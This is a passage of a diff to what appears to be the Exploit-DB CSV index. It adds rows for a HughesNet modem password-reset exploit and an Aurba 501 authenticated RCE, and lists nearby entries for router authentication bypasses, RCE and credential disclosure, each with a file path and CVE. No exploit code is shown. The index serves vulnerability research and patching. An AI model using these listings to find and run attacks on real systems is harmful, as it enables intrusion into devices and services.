Execution",2018-12-14,Rebellion,webapps,hardware,,2018-12-14,2018-12-14,0,CVE-2015-7254,,,,, +52073,exploits/hardware/webapps/52073.py,"HughesNet HT2000W Satellite Modem - Password Reset",2024-08-24,"Simon Greenblatt",webapps,hardware,,2024-08-24,2024-08-24,0,,,,,, 42284,exploits/hardware/webapps/42284.py,"Humax HG100R 2.0.6 - Backup File Download",2017-06-30,gambler,webapps,hardware,,2017-06-30,2017-06-30,0,,,,,, 42732,exploits/hardware/webapps/42732.py,"Humax Wi-Fi Router HG100R 2.0.6 - Authentication Bypass",2017-09-14,Kivson,webapps,hardware,,2017-09-15,2017-10-03,0,CVE-2017-11435,,,,, 39951,exploits/hardware/webapps/39951.txt,"Hyperoptic (Tilgin) Router HG23xx - Multiple Vulnerabilities",2016-06-15,LiquidWorm,webapps,hardware,80,2016-06-15,2016-06-15,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5329.php @@ -8917,6 +8922,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 45933,exploits/linux/webapps/45933.py,"Apache Superset < 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux,,2018-12-03,2018-12-05,0,CVE-2018-8021,,,,http://www.exploit-db.comincubator-superset-0.22.0.tar.gz, 47900,exploits/linux/webapps/47900.txt,"ASTPP 4.0.1 VoIP Billing - Database Backup Download",2020-01-10,"Fabien AUNAY",webapps,linux,,2020-01-10,2020-01-10,0,,,,,, 20037,exploits/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel - SQL Root Password Disclosure",2012-07-23,Ciph3r,webapps,linux,,2012-07-23,2012-07-23,1,OSVDB-84397,,,,, +52074,exploits/linux/webapps/52074.py,"Aurba 501 - Authenticated RCE",2024-08-24,"Hosein Vita",webapps,linux,,2024-08-24,2024-08-24,0,,,,,, 21836,exploits/linux/webapps/21836.rb,"Auxilium RateMyPet - Arbitrary File Upload (Metasploit)",2012-10-10,Metasploit,webapps,linux,,2012-10-10,2012-10-10,1,OSVDB-85554,"Metasploit Framework (MSF)",,,, 40171,exploits/linux/webapps/40171.txt,"AXIS (Multiple Products) - 'devtools ' (Authenticated) Remote Command Execution",2016-07-29,Orwelllabs,webapps,linux,80,2016-07-29,2016-07-29,0,CVE-2015-8257,,,,,http://www.orwelllabs.com/2016/01/axis-commucations-multiple-products.html 47150,exploits/linux/webapps/47150.txt,"Axway SecureTransport 5 - Unauthenticated XML Injection",2019-07-22,"Dominik Penner",webapps,linux,,2019-07-22,2019-07-22,0,,,,,,